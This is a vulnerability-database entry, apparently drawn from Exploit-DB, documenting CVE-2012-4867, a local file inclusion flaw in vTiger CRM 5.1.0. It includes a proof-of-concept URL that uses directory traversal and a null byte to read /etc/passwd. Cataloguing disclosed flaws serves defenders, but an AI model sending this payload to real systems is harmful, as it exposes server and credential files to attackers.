ID
VAR-E-201204-0615
CVE
| cve_id: | CVE-2012-4867 | Trust: 1.6 |
EDB ID
18770
TITLE
vTiger CRM 5.1.0 - Local File Inclusion - PHP webapps Exploit
Trust: 0.6
DESCRIPTION
vTiger CRM 5.1.0 - Local File Inclusion. CVE-80552CVE-2012-4867 . webapps exploit for PHP platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | vtiger | model: | crm | scope: | eq | version: | 5.1.0 | Trust: 1.6 |
EXPLOIT
# Exploit Title: VTiger CRM
# Google Dork: None
# Date: 20/03/2012
# Author: Pi3rrot
# Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/
# Version: 5.1.0
# Tested on: CentOS 6
# CVE : none
We have find this vulnerabilitie in VTiger 5.1.0
In this example, you can see a Local file Inclusion in the file sortfieldsjson.php
Try this :
https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Local File Inclusion
Trust: 1.6
CREDITS
Pi3rrot
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2012-4867 | Trust: 1.6 |
| db: | EXPLOIT-DB | id: | 18770 | Trust: 1.6 |
| db: | EDBNET | id: | 41081 | Trust: 0.6 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2012-4867 | Trust: 1.6 |
| url: | https://www.exploit-db.com/exploits/18770/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 18770 |
| db: | EDBNET | id: | 41081 |
LAST UPDATE DATE
2022-07-27T09:56:51.269000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 18770 | date: | 2012-04-22T00:00:00 |
| db: | EDBNET | id: | 41081 | date: | 2012-04-22T00:00:00 |